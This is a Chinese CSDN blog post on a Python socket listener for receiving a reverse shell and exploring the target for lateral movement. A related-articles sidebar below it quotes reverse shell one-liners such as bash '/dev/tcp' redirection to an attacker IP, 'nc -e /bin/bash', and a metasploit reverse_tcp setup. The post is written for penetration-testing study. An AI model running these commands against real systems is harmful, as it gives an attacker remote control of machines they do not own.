python 反弹shell 交互

最新推荐文章于 2024-05-15 21:26:16 发布
最新推荐文章于 2024-05-15 21:26:16 发布
阅读量1k 收藏 4
点赞数 1
文章标签: python 网络安全 人工智能
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32851223/article/details/127856299
版权

python脚本 拿到反弹shell后,横向移动

本篇介绍解决如下问题的python脚本:漏洞利用,监听攻击机的端口拿到反弹shell,利用反弹shell进行横向的信息探索。
本篇的重要参考文献如下:
关于一次python获得完整交互式shell的研究:https://xz.aliyun.com/t/7721

使用方式

靶机:

靶机需要做的

攻击机:

攻击机需要做的

使用socket 监听

socket接收反弹shell,建立链接
conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
conn.bind(('10.200.9.6', port))
conn.listen(1)
使用子进程, 时刻反馈靶机的输出信息
talk, addr = conn.accept()
stdprint("Connect from %s.\n" % addr[0])
thread.start_new_thread(recv_daemon, (talk,))
recv_daemon(conn)函数
def recv_daemon(conn):
    global CONN_ONLINE
    while CONN_ONLINE:
        try:
            tmp = conn.recv(16)
            if (tmp):
                STDOUT.write(tmp)
                stdout.flush()
            else:
                raise socket.error
        except socket.error:
            msg = "Connection close by socket.\n"
            stdprint(msg)
            close_socket(conn, 1)

关于一次python获得完整交互式shell的研究:https://xz.aliyun.com/t/7721 这篇博文中还包括实时交互的内容,可以参考。

查阅信息时,貌似pty库是解决这个问题了的,怎么用一直没get明白,有案例介绍的,欢迎评论区告诉我O(∩_∩)O

qq_32851223
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python交互shell_shell脚本与Python交互
weixin_39610722的博客
11-27 609
1、Python针对shell获取传入,输出参数传入:"$num"例如: $0表示文件名,$1表示shell获取的第一个参数输出:通过打印shell结果的方式,输出参数给Python。例如: echo "{$iplist}",Python调用执行shell的方法即可获取结果。2、获取切换用户后加载shell环境执行Python命令的结果。比如我登录号是root权限,现在加载的shell环境需要te...
各种shell反弹方法
weixin_46626737的博客
05-16 2495
s.connect(("攻击ip",port));再在目标机器执行bash -i > &/dev/tcp/攻击ip/端口 0>&1。post方式,ip=?2.使用nc进行反弹shell。6.使用php反弹shell
Python 渗透测试:反弹 shell反弹 后门 || 程序免杀)
最新发布
网络安全领域___专研者.
05-15 1797
反弹 shell (Reverse Shell) 是一种常见的渗透测试技术,它指的是受害者主机主动连接攻击者的主机,从而让攻击者获得对受害者主机的控制权。在一个典型的反弹 shell 攻击中,攻击者会在自己的主机上监听一个特定的端口,然后诱使目标主机主动连接到这个端口。当目标主机与攻击者的主机建立连接后,攻击者就可以通过这个连接获得目标主机的 shell 访问权限,从而进行进一步的渗透和控制。
python反弹shell
weixin_42576467的博客
01-07 674
你是想问 Python 如何实现反弹 shell 吗? 反弹 shell 是一种通过远程连接获取受害者计算机的 shell 权限的攻击技术。 使用 Python 反弹 shell 的方法如下: 首先,在本地计算机上运行一个监听程序,等待连接。 然后,在受害者计算机上运行一个 Python 脚本,该脚本将连接到本地计算机的监听程序。 当连接建立后,就可以通过本地计算机上的 shell 命令控制...
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 5328
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
反弹Shell升级为交互式Shel
weixin_46622976的博客
04-27 1414
前言 经常我们拿到的shell是一个简单的shell 如何把一个简单的shell就升级到一个标准交互shell 写这篇文章记录一下 正文 攻击机:kali 靶机:ubuntu 普通Shell 给kali弹shell bash -i >& /dev/tcp/192.168.145.128/4444 0>&1 kali:nc -lvvp 4444 然后发现这个shell有很多问题 无法使用vim等文本编辑器 不能补全 不能su 没有向上箭头使用历史 等等 .
python反弹shell_反弹Shell小结
weixin_34979632的博客
01-15 6641
1、NC反弹shell1.1、正向反弹shell服务器nc -lvvp 7777 -e /bin/bash攻击机nc server-ip 77771.2、反向反弹shell攻击机nc -lvvp 7777服务器nc -e /bin/bash Client-ip 77771.3、不带-e反弹:2、 bash反弹shell2.1 bash -i攻击机nc -lvvp 7777服务器bash -i &...
Pythonshell的3种交互方式介绍
09-22
本篇文章主要探讨了Pythonshell交互的三种方法:os.system、os.popen以及subprocess模块。以下是对这些方法的详细解释: 1. os.system(cmd) `os.system()` 方法用于执行shell命令,并返回一个退出状态码。这个...
python邮件反弹shell
09-29
使用python反弹shell,根据邮件确定反弹地址
python IDLE shell 中文界面
05-16
标题提到的“python IDLE shell 中文界面”是指通过更换特定文件来将IDLE的界面语言切换为中文。这个过程涉及到对Python安装目录的修改,特别是针对`Lib`文件夹下的`idlelib`子目录。在描述中,博主指出他们使用的...
举例讲解Python程序与系统shell交互的方式
09-22
以上代码演示了多种方式在Python程序中与shell交互,包括执行命令、读取输出、写入输入以及实现进程间通信。理解这些方法对于编写涉及系统交互Python程序至关重要,特别是在自动化任务、数据处理和集成外部工具时...
Python安全之编写反弹连接‘免杀’后门
weixin_43853965的博客
01-07 1280
生成后门的工具: 虽然在WEB安全专栏,不过今天要编写的是一个二进制后门,而不是WEB后门。按惯例还是来一段KALI里面的“免杀”后门生成工具,大名鼎鼎的metasploit: 方法一msfconsole: msf5 > use windows/shell/reverse_tcp msf5 payload(windows/shell/reverse_tcp) > set lhost...
Python获取bash反弹shell,并与bash交互
Locosomnus的博客
10-22 210
利用python获取来自bash的反弹shell
[Web安全]Python利用Socket反弹shell,多线程反弹Shell
_DESpiSED的博客
09-22 1970
本文详细介绍了Python利用套接字编程反弹shell和多线程反弹shell的过程,给网络安全初学者提供一定思路。
Python调用Shell命令 (python,shell 混合编程)
m0_59485658的博客
03-11 4239
直接调用命令,返回值即是系统返回。可以看出,popen方法通过p.read()获取终端输出,而且popen需要关闭close().当执行成功时,close()不返回任何值,失败时,close()返回系统返回值. 可见它获取返回值的方式和os.system不同。例如,在Python安装完成之后都会存在有交互式的编程环境,那么本次将通过程序调用交互式编程环境直接操作python命令行,在python命令行中直接输入程序。返回值是依赖于系统的,直接返回系统的调用返回值,所以windows和linux是不一样的。
反弹shell的N种姿势
热门推荐
记录并分享学习安全的知识点..
09-13 1万+
在渗透测试的过程中,在拿到webshell以后,如果目标主机是Windows主机,则是通过开3389端口在远程连接,如果目标主机是linux服务器,一般我们都会选择反弹shell来进行操作。在这里总结下反弹shell常见的几种姿势。
简单的反弹shell到全交互shell
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
11-01 868
参考文章: https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/socat是类Unix系统下的一个工具,可以看作是 nc 的加强版。所以我们可以使用socat来传递完整的带有tty的TCP连接。如何把一个简单的shell就升级到一个标准交互shell。就可以得到一个完整的交互shell了,非常方便。另一种 socat 反弹真正交互式的 Shell。经常我们拿到的shell是一个简单的shell

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值